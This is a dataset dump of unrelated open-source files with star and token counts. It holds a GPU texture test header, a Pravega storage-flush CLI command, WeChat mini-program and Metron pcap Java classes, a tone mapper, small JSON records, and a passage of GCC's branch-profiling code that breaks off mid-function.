max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
354
#ifndef _ES2PTEXTURECASES_HPP #define _ES2PTEXTURECASES_HPP /*------------------------------------------------------------------------- * drawElements Quality Program OpenGL ES 2.0 Module * ------------------------------------------------- * * Copyright 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *//*! * \file * \brief Texture format performance tests. *//*--------------------------------------------------------------------*/ #include "tcuDefs.hpp" #include "tes2TestCase.hpp" #include "glsShaderPerformanceCase.hpp" #include "tcuMatrix.hpp" #include "gluTexture.hpp" namespace deqp { namespace gles2 { namespace Performance { class Texture2DRenderCase : public gls::ShaderPerformanceCase { public: Texture2DRenderCase (Context& context, const char* name, const char* description, deUint32 format, deUint32 dataType, deUint32 wrapS, deUint32 wrapT, deUint32 minFilter, deUint32 magFilter, const tcu::Mat3& coordTransform, int numTextures, bool powerOfTwo); ~Texture2DRenderCase (void); void init (void); void deinit (void); private: void setupProgram (deUint32 program); void setupRenderState (void); deUint32 m_format; deUint32 m_dataType; deUint32 m_wrapS; deUint32 m_wrapT; deUint32 m_minFilter; deUint32 m_magFilter; tcu::Mat3 m_coordTransform; int m_numTextures; bool m_powerOfTwo; std::vector<glu::Texture2D*> m_textures; }; } // Performance } // gles2 } // deqp #endif // _ES2PTEXTURECASES_HPP
835
1,840
/** * Copyright Pravega Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.pravega.cli.admin.segmentstore; import io.pravega.cli.admin.CommandArgs; import io.pravega.cli.admin.utils.AdminSegmentHelper; import io.pravega.shared.protocol.netty.PravegaNodeUri; import io.pravega.shared.protocol.netty.WireCommands; import lombok.Cleanup; import org.apache.curator.framework.CuratorFramework; import java.util.concurrent.CompletableFuture; import java.util.concurrent.TimeUnit; import static java.lang.Integer.parseInt; /** * Executes a FlushToStorage request against the chosen Segment Store instance. */ public class FlushToStorageCommand extends ContainerCommand { private static final int REQUEST_TIMEOUT_SECONDS = 30; private static final String ALL_CONTAINERS = "all"; /** * Creates new instance of the FlushToStorageCommand. * * @param args The arguments for the command. */ public FlushToStorageCommand(CommandArgs args) { super(args); } @Override public void execute() throws Exception { ensureArgCount(2); final String containerId = getArg(0); final String segmentStoreHost = getArg(1); @Cleanup CuratorFramework zkClient = createZKClient(); @Cleanup AdminSegmentHelper adminSegmentHelper = instantiateAdminSegmentHelper(zkClient); if (containerId.equalsIgnoreCase(ALL_CONTAINERS)) { int containerCount = getServiceConfig().getContainerCount(); for (int id = 0; id < containerCount; id++) { flushContainerToStorage(adminSegmentHelper, id, segmentStoreHost); } } else { flushContainerToStorage(adminSegmentHelper, parseInt(containerId), segmentStoreHost); } } private void flushContainerToStorage(AdminSegmentHelper adminSegmentHelper, int containerId, String segmentStoreHost) throws Exception { CompletableFuture<WireCommands.StorageFlushed> reply = adminSegmentHelper.flushToStorage(containerId, new PravegaNodeUri(segmentStoreHost, getServiceConfig().getAdminGatewayPort()), super.authHelper.retrieveMasterToken()); reply.get(REQUEST_TIMEOUT_SECONDS, TimeUnit.SECONDS); output("Flushed the Segment Container with containerId %d to Storage.", containerId); } public static CommandDescriptor descriptor() { return new CommandDescriptor(COMPONENT, "flush-to-storage", "Persist the given Segment Container into Storage.", new ArgDescriptor("container-id", "The container Id of the Segment Container that needs to be persisted, " + "if given as \"all\" all the containers will be persisted."), new ArgDescriptor("segmentstore-endpoint", "Address of the Segment Store we want to send this request.")); } }
1,148
3,287
<gh_stars>1000+ # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- def backup_exception_handler(ex): from azure.core.exceptions import HttpResponseError if isinstance(ex, HttpResponseError) and ex.message: raise HttpResponseError(ex.message) raise ex
124
335
{ "word": "Bothersome", "definitions": [ "Annoying; troublesome." ], "parts-of-speech": "Adjective" }
60
1,609
package com.mossle.disk.persistence.manager; import com.mossle.core.hibernate.HibernateEntityDao; import com.mossle.disk.persistence.domain.DiskVersion; import org.springframework.stereotype.Service; @Service public class DiskVersionManager extends HibernateEntityDao<DiskVersion> { }
97
358
#include <agz/tracer/core/post_processor.h> #include <agz/tracer/utility/logger.h> #include <agz-utils/misc.h> AGZ_TRACER_BEGIN class ACESToneMapper : public PostProcessor { static real aces_curve(real x) noexcept { constexpr real tA = real(2.51); constexpr real tB = real(0.03); constexpr real tC = real(2.43); constexpr real tD = real(0.59); constexpr real tE = real(0.14); return math::clamp( (x * (tA * x + tB)) / (x * (tC * x + tD) + tE), real(0), real(1)); } static Spectrum avg_lum(const Image2D<Spectrum> &img) { Spectrum sum; for(int y = 0; y < img.height(); ++y) { for(int x = 0; x < img.width(); ++x) { sum.r += std::log(real(0.01) + math::clamp<real>(img(y, x).r, 0, 4)); sum.g += std::log(real(0.01) + math::clamp<real>(img(y, x).g, 0, 4)); sum.b += std::log(real(0.01) + math::clamp<real>(img(y, x).b, 0, 4)); } } return sum.map([&](real x) { return std::exp(x / (img.width() * img.height())); }); } real exposure_ = 10; public: explicit ACESToneMapper(real exposure) { AGZ_HIERARCHY_TRY exposure_ = exposure; if(exposure_ < 0) throw ObjectConstructionException("invalid exposure value"); AGZ_HIERARCHY_WRAP("in initializing ACES tone mapper") } void process(RenderTarget &render_target) override { AGZ_INFO("aces tone mapping"); auto &image = render_target.image; for(int y = 0; y < image.height(); ++y) { for(int x = 0; x < image.width(); ++x) { auto &pixel = image(y, x); pixel.r = aces_curve(pixel.r * exposure_); pixel.g = aces_curve(pixel.g * exposure_); pixel.b = aces_curve(pixel.b * exposure_); } } } }; RC<PostProcessor> create_aces_tone_mapper(real exposure) { return newRC<ACESToneMapper>(exposure); } AGZ_TRACER_END
1,163
348
{"nom":"Maurrin","circ":"3ème circonscription","dpt":"Landes","inscrits":349,"abs":137,"votants":212,"blancs":2,"nuls":18,"exp":192,"res":[{"nuance":"SOC","nom":"<NAME>","voix":99},{"nuance":"REM","nom":"<NAME>","voix":93}]}
89
1,338
#include "../common.h" #include "AppQuitRequestedTester.h" #include "AppQuitTester.h" #include "AppRunTester.h" #include "BApplicationTester.h" CppUnit::Test* ApplicationTestSuite() { CppUnit::TestSuite *testSuite = new CppUnit::TestSuite(); testSuite->addTest(AppQuitRequestedTester::Suite()); testSuite->addTest(AppQuitTester::Suite()); testSuite->addTest(AppRunTester::Suite()); testSuite->addTest(TBApplicationTester::Suite()); return testSuite; }
181
930
package com.foxinmy.weixin4j.wxa; import java.util.Properties; import com.foxinmy.weixin4j.cache.CacheStorager; import com.foxinmy.weixin4j.cache.FileCacheStorager; import com.foxinmy.weixin4j.model.Token; import com.foxinmy.weixin4j.model.WeixinAccount; import com.foxinmy.weixin4j.mp.token.WeixinTokenCreator; import com.foxinmy.weixin4j.token.TokenCreator; import com.foxinmy.weixin4j.token.TokenManager; import com.foxinmy.weixin4j.wxa.api.CustomMessageApi; import com.foxinmy.weixin4j.wxa.api.LoginApi; import com.foxinmy.weixin4j.wxa.api.QrCodeApi; import com.foxinmy.weixin4j.wxa.api.SecCheckApi; import com.foxinmy.weixin4j.wxa.api.TemplateApi; import com.foxinmy.weixin4j.wxa.api.TemplateMessageApi; import com.foxinmy.weixin4j.wxa.api.SubscribeMessageApi; /** * The facade of WeChat Mini Program APIs. * * @since 1.8 */ public class WeixinAppFacade { private final LoginApi loginApi; private final QrCodeApi qrCodeApi; private final TemplateApi templateApi; private final TemplateMessageApi templateMessageApi; private final CustomMessageApi customMessageApi; private final SecCheckApi secCheckApi; private final SubscribeMessageApi subscribeMessageApi; /** * Constructs {@link WeixinAppFacade} using {@link FileCacheStorager}. * * @param weixinAccount the {@link WeixinAccount}. */ public WeixinAppFacade( WeixinAccount weixinAccount ) { this( weixinAccount, new FileCacheStorager<Token>() ); } /** * Constructs {@link WeixinAppFacade} using specified {@link CacheStorager}. * * @param weixinAccount the {@link WeixinAccount}. * @param cacheStorager the {@link CacheStorager}. */ public WeixinAppFacade( WeixinAccount weixinAccount, CacheStorager<Token> cacheStorager ) { this( weixinAccount, cacheStorager, null ); } /** * Constructs {@link WeixinAppFacade} using specified {@link CacheStorager}, * and overrides properties defined in {@code weixin.properties}. * * @param weixinAccount the {@link WeixinAccount}. * @param cacheStorager the {@link CacheStorager}. * @param properties properties to overrides the properties defined in {@code weixin.properties}. */ public WeixinAppFacade( WeixinAccount weixinAccount, CacheStorager<Token> cacheStorager, Properties properties ) { this( weixinAccount, new WeixinTokenCreator(weixinAccount.getId(), weixinAccount.getSecret()), cacheStorager, properties ); } private WeixinAppFacade( WeixinAccount weixinAccount, TokenCreator tokenCreator, CacheStorager<Token> cacheStorager, Properties properties ) { if (weixinAccount == null) { throw new IllegalArgumentException( "weixinAccount must not be empty"); } if (tokenCreator == null) { throw new IllegalArgumentException( "tokenCreator must not be empty"); } if (cacheStorager == null) { throw new IllegalArgumentException( "cacheStorager must not be empty"); } final TokenManager tokenManager = new TokenManager(tokenCreator, cacheStorager); this.loginApi = new LoginApi(weixinAccount, properties); this.qrCodeApi = new QrCodeApi(tokenManager, properties); this.templateApi = new TemplateApi(tokenManager, properties); this.templateMessageApi = new TemplateMessageApi(tokenManager, properties); this.customMessageApi = new CustomMessageApi(tokenManager, properties); this.secCheckApi = new SecCheckApi(tokenManager, properties); this.subscribeMessageApi = new SubscribeMessageApi(tokenManager, properties); } /** * 获取登录相关的 API。 * * @return 登录相关 API。 */ public LoginApi getLoginApi() { return loginApi; } /** * 获取小程序码、小程序二维码相关的 API。 * * @return 小程序码、小程序二维码相关的 API。 */ public QrCodeApi getQrCodeApi() { return qrCodeApi; } /** * 获取模版消息管理相关的 API。 * * @return 模版消息管理相关的 API。 */ public TemplateApi getTemplateApi() { return templateApi; } /** * 获取模板消息相关的 API。 * * @return 模板消息相关的 API。 */ public TemplateMessageApi getTemplateMessageApi() { return templateMessageApi; } /** * 获取订阅消息相关的 API。 * * @return 模板消息相关的 API。 */ public SubscribeMessageApi getSubscribeMessageApi() { return subscribeMessageApi; } /** * 获取客服消息相关的 API。 * * @return 客服消息相关的 API。 */ public CustomMessageApi getCustomMessageApi() { return customMessageApi; } /** * 获取内容安全相关的 API。 * * @return 内容安全相关的 API。 * @since 1.9 */ public SecCheckApi getSecCheckApi() { return secCheckApi; } }
1,917
679
<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef _COMPHELPER_STREAM_SEEKABLEINPUT_HXX_ #define _COMPHELPER_STREAM_SEEKABLEINPUT_HXX_ #include <osl/mutex.hxx> #include <com/sun/star/uno/Reference.hxx> #include <com/sun/star/lang/XMultiServiceFactory.hpp> #include <com/sun/star/io/XInputStream.hpp> #include <com/sun/star/io/XSeekable.hpp> #include <cppuhelper/implbase2.hxx> #include "comphelper/comphelperdllapi.h" namespace comphelper { class COMPHELPER_DLLPUBLIC OSeekableInputWrapper : public ::cppu::WeakImplHelper2< ::com::sun::star::io::XInputStream, ::com::sun::star::io::XSeekable > { ::osl::Mutex m_aMutex; ::com::sun::star::uno::Reference< ::com::sun::star::lang::XMultiServiceFactory > m_xFactory; ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream > m_xOriginalStream; ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream > m_xCopyInput; ::com::sun::star::uno::Reference< ::com::sun::star::io::XSeekable > m_xCopySeek; private: COMPHELPER_DLLPRIVATE void PrepareCopy_Impl(); public: OSeekableInputWrapper( const ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream >& xInStream, const ::com::sun::star::uno::Reference< ::com::sun::star::lang::XMultiServiceFactory >& xFactory ); virtual ~OSeekableInputWrapper(); static ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream > CheckSeekableCanWrap( const ::com::sun::star::uno::Reference< ::com::sun::star::io::XInputStream >& xInStream, const ::com::sun::star::uno::Reference< ::com::sun::star::lang::XMultiServiceFactory >& xFactory ); // XInputStream virtual sal_Int32 SAL_CALL readBytes( ::com::sun::star::uno::Sequence< sal_Int8 >& aData, sal_Int32 nBytesToRead ) throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::BufferSizeExceededException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int32 SAL_CALL readSomeBytes( ::com::sun::star::uno::Sequence< sal_Int8 >& aData, sal_Int32 nMaxBytesToRead ) throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::BufferSizeExceededException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual void SAL_CALL skipBytes( sal_Int32 nBytesToSkip ) throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::BufferSizeExceededException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int32 SAL_CALL available() throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual void SAL_CALL closeInput() throw (::com::sun::star::io::NotConnectedException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); // XSeekable virtual void SAL_CALL seek( sal_Int64 location ) throw (::com::sun::star::lang::IllegalArgumentException, ::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int64 SAL_CALL getPosition() throw (::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); virtual sal_Int64 SAL_CALL getLength() throw (::com::sun::star::io::IOException, ::com::sun::star::uno::RuntimeException); }; } // namespace comphelper #endif
1,410
631
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.metron.rest.model.pcap; import org.apache.commons.collections4.map.AbstractMapDecorator; import org.apache.metron.pcap.config.PcapOptions; import java.util.HashMap; public abstract class PcapRequest extends AbstractMapDecorator<String, Object> { public PcapRequest() { super(new HashMap<>()); setStartTimeMs(0L); setEndTimeMs(System.currentTimeMillis()); setNumReducers(10); } public String getBasePath() { return PcapOptions.BASE_PATH.get(this, String.class); } public void setBasePath(String basePath) { PcapOptions.BASE_PATH.put(this, basePath); } public String getBaseInterimResultPath() { return PcapOptions.BASE_INTERIM_RESULT_PATH.get(this, String.class); } public void setBaseInterimResultPath(String baseInterimResultPath) { PcapOptions.BASE_INTERIM_RESULT_PATH.put(this, baseInterimResultPath); } public String getFinalOutputPath() { return PcapOptions.FINAL_OUTPUT_PATH.get(this, String.class); } public void setFinalOutputPath(String finalOutputPath) { PcapOptions.FINAL_OUTPUT_PATH.put(this, finalOutputPath); } public Long getStartTimeMs() { return PcapOptions.START_TIME_MS.get(this, Long.class); } public void setStartTimeMs(Long startTime) { PcapOptions.START_TIME_MS.put(this, startTime); } public Long getEndTimeMs() { return PcapOptions.END_TIME_MS.get(this, Long.class); } public void setEndTimeMs(Long endTime) { PcapOptions.END_TIME_MS.put(this, endTime); } public Integer getNumReducers() { return PcapOptions.NUM_REDUCERS.get(this, Integer.class); } public void setNumReducers(Integer numReducers) { PcapOptions.NUM_REDUCERS.put(this, numReducers); } public abstract void setFields(); }
831
432
<gh_stars>100-1000 /* Calculate branch probabilities, and basic block execution counts. Copyright (C) 1990, 1991, 1992, 1993, 1994, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2007, 2008, 2009, 2010, 2011, 2012 Free Software Foundation, Inc. Contributed by <NAME>, UC Berkeley/Cygnus Support; based on some ideas from Dain Samples of UC Berkeley. Further mangling by <NAME>, Cygnus Support. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3, or (at your option) any later version. GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING3. If not see <http://www.gnu.org/licenses/>. */ /* Generate basic block profile instrumentation and auxiliary files. Profile generation is optimized, so that not all arcs in the basic block graph need instrumenting. First, the BB graph is closed with one entry (function start), and one exit (function exit). Any ABNORMAL_EDGE cannot be instrumented (because there is no control path to place the code). We close the graph by inserting fake EDGE_FAKE edges to the EXIT_BLOCK, from the sources of abnormal edges that do not go to the exit_block. We ignore such abnormal edges. Naturally these fake edges are never directly traversed, and so *cannot* be directly instrumented. Some other graph massaging is done. To optimize the instrumentation we generate the BB minimal span tree, only edges that are not on the span tree (plus the entry point) need instrumenting. From that information all other edge counts can be deduced. By construction all fake edges must be on the spanning tree. We also attempt to place EDGE_CRITICAL edges on the spanning tree. The auxiliary files generated are <dumpbase>.gcno (at compile time) and <dumpbase>.gcda (at run time). The format is described in full in gcov-io.h. */ /* ??? Register allocation should use basic block execution counts to give preference to the most commonly executed blocks. */ /* ??? Should calculate branch probabilities before instrumenting code, since then we can use arc counts to help decide which arcs to instrument. */ #include "config.h" #include "system.h" #include "coretypes.h" #include "tm.h" #include "rtl.h" #include "flags.h" #include "output.h" #include "regs.h" #include "expr.h" #include "function.h" #include "basic-block.h" #include "diagnostic-core.h" #include "coverage.h" #include "value-prof.h" #include "tree.h" #include "cfghooks.h" #include "tree-flow.h" #include "timevar.h" #include "cfgloop.h" #include "tree-pass.h" #include "profile.h" struct bb_info { unsigned int count_valid : 1; /* Number of successor and predecessor edges. */ gcov_type succ_count; gcov_type pred_count; }; #define BB_INFO(b) ((struct bb_info *) (b)->aux) /* Counter summary from the last set of coverage counts read. */ const struct gcov_ctr_summary *profile_info; /* Collect statistics on the performance of this pass for the entire source file. */ static int total_num_blocks; static int total_num_edges; static int total_num_edges_ignored; static int total_num_edges_instrumented; static int total_num_blocks_created; static int total_num_passes; static int total_num_times_called; static int total_hist_br_prob[20]; static int total_num_branches; /* Forward declarations. */ static void find_spanning_tree (struct edge_list *); /* Add edge instrumentation code to the entire insn chain. F is the first insn of the chain. NUM_BLOCKS is the number of basic blocks found in F. */ static unsigned instrument_edges (struct edge_list *el) { unsigned num_instr_edges = 0; int num_edges = NUM_EDGES (el); basic_block bb; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) { struct edge_info *inf = EDGE_INFO (e); if (!inf->ignore && !inf->on_tree) { gcc_assert (!(e->flags & EDGE_ABNORMAL)); if (dump_file) fprintf (dump_file, "Edge %d to %d instrumented%s\n", e->src->index, e->dest->index, EDGE_CRITICAL_P (e) ? " (and split)" : ""); gimple_gen_edge_profiler (num_instr_edges++, e); } } } total_num_blocks_created += num_edges; if (dump_file) fprintf (dump_file, "%d edges instrumented\n", num_instr_edges); return num_instr_edges; } /* Add code to measure histograms for values in list VALUES. */ static void instrument_values (histogram_values values) { unsigned i, t; /* Emit code to generate the histograms before the insns. */ for (i = 0; i < VEC_length (histogram_value, values); i++) { histogram_value hist = VEC_index (histogram_value, values, i); switch (hist->type) { case HIST_TYPE_INTERVAL: t = GCOV_COUNTER_V_INTERVAL; break; case HIST_TYPE_POW2: t = GCOV_COUNTER_V_POW2; break; case HIST_TYPE_SINGLE_VALUE: t = GCOV_COUNTER_V_SINGLE; break; case HIST_TYPE_CONST_DELTA: t = GCOV_COUNTER_V_DELTA; break; case HIST_TYPE_INDIR_CALL: t = GCOV_COUNTER_V_INDIR; break; case HIST_TYPE_AVERAGE: t = GCOV_COUNTER_AVERAGE; break; case HIST_TYPE_IOR: t = GCOV_COUNTER_IOR; break; default: gcc_unreachable (); } if (!coverage_counter_alloc (t, hist->n_counters)) continue; switch (hist->type) { case HIST_TYPE_INTERVAL: gimple_gen_interval_profiler (hist, t, 0); break; case HIST_TYPE_POW2: gimple_gen_pow2_profiler (hist, t, 0); break; case HIST_TYPE_SINGLE_VALUE: gimple_gen_one_value_profiler (hist, t, 0); break; case HIST_TYPE_CONST_DELTA: gimple_gen_const_delta_profiler (hist, t, 0); break; case HIST_TYPE_INDIR_CALL: gimple_gen_ic_profiler (hist, t, 0); break; case HIST_TYPE_AVERAGE: gimple_gen_average_profiler (hist, t, 0); break; case HIST_TYPE_IOR: gimple_gen_ior_profiler (hist, t, 0); break; default: gcc_unreachable (); } } } /* Computes hybrid profile for all matching entries in da_file. CFG_CHECKSUM is the precomputed checksum for the CFG. */ static gcov_type * get_exec_counts (unsigned cfg_checksum, unsigned lineno_checksum) { unsigned num_edges = 0; basic_block bb; gcov_type *counts; /* Count the edges to be (possibly) instrumented. */ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) if (!EDGE_INFO (e)->ignore && !EDGE_INFO (e)->on_tree) num_edges++; } counts = get_coverage_counts (GCOV_COUNTER_ARCS, num_edges, cfg_checksum, lineno_checksum, &profile_info); if (!counts) return NULL; if (dump_file && profile_info) fprintf(dump_file, "Merged %u profiles with maximal count %u.\n", profile_info->runs, (unsigned) profile_info->sum_max); return counts; } static bool is_edge_inconsistent (VEC(edge,gc) *edges) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, edges) { if (!EDGE_INFO (e)->ignore) { if (e->count < 0 && (!(e->flags & EDGE_FAKE) || !block_ends_with_call_p (e->src))) { if (dump_file) { fprintf (dump_file, "Edge %i->%i is inconsistent, count"HOST_WIDEST_INT_PRINT_DEC, e->src->index, e->dest->index, e->count); dump_bb (e->src, dump_file, 0); dump_bb (e->dest, dump_file, 0); } return true; } } } return false; } static void correct_negative_edge_counts (void) { basic_block bb; edge e; edge_iterator ei; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { FOR_EACH_EDGE (e, ei, bb->succs) { if (e->count < 0) e->count = 0; } } } /* Check consistency. Return true if inconsistency is found. */ static bool is_inconsistent (void) { basic_block bb; bool inconsistent = false; FOR_EACH_BB (bb) { inconsistent |= is_edge_inconsistent (bb->preds); if (!dump_file && inconsistent) return true; inconsistent |= is_edge_inconsistent (bb->succs); if (!dump_file && inconsistent) return true; if (bb->count < 0) { if (dump_file) { fprintf (dump_file, "BB %i count is negative " HOST_WIDEST_INT_PRINT_DEC, bb->index, bb->count); dump_bb (bb, dump_file, 0); } inconsistent = true; } if (bb->count != sum_edge_counts (bb->preds)) { if (dump_file) { fprintf (dump_file, "BB %i count does not match sum of incoming edges " HOST_WIDEST_INT_PRINT_DEC" should be " HOST_WIDEST_INT_PRINT_DEC, bb->index, bb->count, sum_edge_counts (bb->preds)); dump_bb (bb, dump_file, 0); } inconsistent = true; } if (bb->count != sum_edge_counts (bb->succs) && ! (find_edge (bb, EXIT_BLOCK_PTR) != NULL && block_ends_with_call_p (bb))) { if (dump_file) { fprintf (dump_file, "BB %i count does not match sum of outgoing edges " HOST_WIDEST_INT_PRINT_DEC" should be " HOST_WIDEST_INT_PRINT_DEC, bb->index, bb->count, sum_edge_counts (bb->succs)); dump_bb (bb, dump_file, 0); } inconsistent = true; } if (!dump_file && inconsistent) return true; } return inconsistent; } /* Set each basic block count to the sum of its outgoing edge counts */ static void set_bb_counts (void) { basic_block bb; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { bb->count = sum_edge_counts (bb->succs); gcc_assert (bb->count >= 0); } } /* Reads profile data and returns total number of edge counts read */ static int read_profile_edge_counts (gcov_type *exec_counts) { basic_block bb; int num_edges = 0; int exec_counts_pos = 0; /* For each edge not on the spanning tree, set its execution count from the .da file. */ /* The first count in the .da file is the number of times that the function was entered. This is the exec_count for block zero. */ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) if (!EDGE_INFO (e)->ignore && !EDGE_INFO (e)->on_tree) { num_edges++; if (exec_counts) { e->count = exec_counts[exec_counts_pos++]; if (e->count > profile_info->sum_max) { if (flag_profile_correction) { static bool informed = 0; if (!informed) inform (input_location, "corrupted profile info: edge count exceeds maximal count"); informed = 1; } else error ("corrupted profile info: edge from %i to %i exceeds maximal count", bb->index, e->dest->index); } } else e->count = 0; EDGE_INFO (e)->count_valid = 1; BB_INFO (bb)->succ_count--; BB_INFO (e->dest)->pred_count--; if (dump_file) { fprintf (dump_file, "\nRead edge from %i to %i, count:", bb->index, e->dest->index); fprintf (dump_file, HOST_WIDEST_INT_PRINT_DEC, (HOST_WIDEST_INT) e->count); } } } return num_edges; } #define OVERLAP_BASE 10000 /* Compare the static estimated profile to the actual profile, and return the "degree of overlap" measure between them. Degree of overlap is a number between 0 and OVERLAP_BASE. It is the sum of each basic block's minimum relative weights between two profiles. And overlap of OVERLAP_BASE means two profiles are identical. */ static int compute_frequency_overlap (void) { gcov_type count_total = 0, freq_total = 0; int overlap = 0; basic_block bb; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { count_total += bb->count; freq_total += bb->frequency; } if (count_total == 0 || freq_total == 0) return 0; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) overlap += MIN (bb->count * OVERLAP_BASE / count_total, bb->frequency * OVERLAP_BASE / freq_total); return overlap; } /* Compute the branch probabilities for the various branches. Annotate them accordingly. CFG_CHECKSUM is the precomputed checksum for the CFG. */ static void compute_branch_probabilities (unsigned cfg_checksum, unsigned lineno_checksum) { basic_block bb; int i; int num_edges = 0; int changes; int passes; int hist_br_prob[20]; int num_branches; gcov_type *exec_counts = get_exec_counts (cfg_checksum, lineno_checksum); int inconsistent = 0; /* Very simple sanity checks so we catch bugs in our profiling code. */ if (!profile_info) return; if (profile_info->run_max * profile_info->runs < profile_info->sum_max) { error ("corrupted profile info: run_max * runs < sum_max"); exec_counts = NULL; } if (profile_info->sum_all < profile_info->sum_max) { error ("corrupted profile info: sum_all is smaller than sum_max"); exec_counts = NULL; } /* Attach extra info block to each bb. */ alloc_aux_for_blocks (sizeof (struct bb_info)); FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; FOR_EACH_EDGE (e, ei, bb->succs) if (!EDGE_INFO (e)->ignore) BB_INFO (bb)->succ_count++; FOR_EACH_EDGE (e, ei, bb->preds) if (!EDGE_INFO (e)->ignore) BB_INFO (bb)->pred_count++; } /* Avoid predicting entry on exit nodes. */ BB_INFO (EXIT_BLOCK_PTR)->succ_count = 2; BB_INFO (ENTRY_BLOCK_PTR)->pred_count = 2; num_edges = read_profile_edge_counts (exec_counts); if (dump_file) fprintf (dump_file, "\n%d edge counts read\n", num_edges); /* For every block in the file, - if every exit/entrance edge has a known count, then set the block count - if the block count is known, and every exit/entrance edge but one has a known execution count, then set the count of the remaining edge As edge counts are set, decrement the succ/pred count, but don't delete the edge, that way we can easily tell when all edges are known, or only one edge is unknown. */ /* The order that the basic blocks are iterated through is important. Since the code that finds spanning trees starts with block 0, low numbered edges are put on the spanning tree in preference to high numbered edges. Hence, most instrumented edges are at the end. Graph solving works much faster if we propagate numbers from the end to the start. This takes an average of slightly more than 3 passes. */ changes = 1; passes = 0; while (changes) { passes++; changes = 0; FOR_BB_BETWEEN (bb, EXIT_BLOCK_PTR, NULL, prev_bb) { struct bb_info *bi = BB_INFO (bb); if (! bi->count_valid) { if (bi->succ_count == 0) { edge e; edge_iterator ei; gcov_type total = 0; FOR_EACH_EDGE (e, ei, bb->succs) total += e->count; bb->count = total; bi->count_valid = 1; changes = 1; } else if (bi->pred_count == 0) { edge e; edge_iterator ei; gcov_type total = 0; FOR_EACH_EDGE (e, ei, bb->preds) total += e->count; bb->count = total; bi->count_valid = 1; changes = 1; } } if (bi->count_valid) { if (bi->succ_count == 1) { edge e; edge_iterator ei; gcov_type total = 0; /* One of the counts will be invalid, but it is zero, so adding it in also doesn't hurt. */ FOR_EACH_EDGE (e, ei, bb->succs) total += e->count; /* Search for the invalid edge, and set its count. */ FOR_EACH_EDGE (e, ei, bb->succs) if (! EDGE_INFO (e)->count_valid && ! EDGE_INFO (e)->ignore) break; /* Calculate count for remaining edge by conservation. */ total = bb->count - total; gcc_assert (e); EDGE_INFO (e)->count_valid = 1; e->count = total; bi->succ_count--; BB_INFO (e->dest)->pred_count--; changes = 1; } if (bi->pred_count == 1) { edge e; edge_iterator ei; gcov_type total = 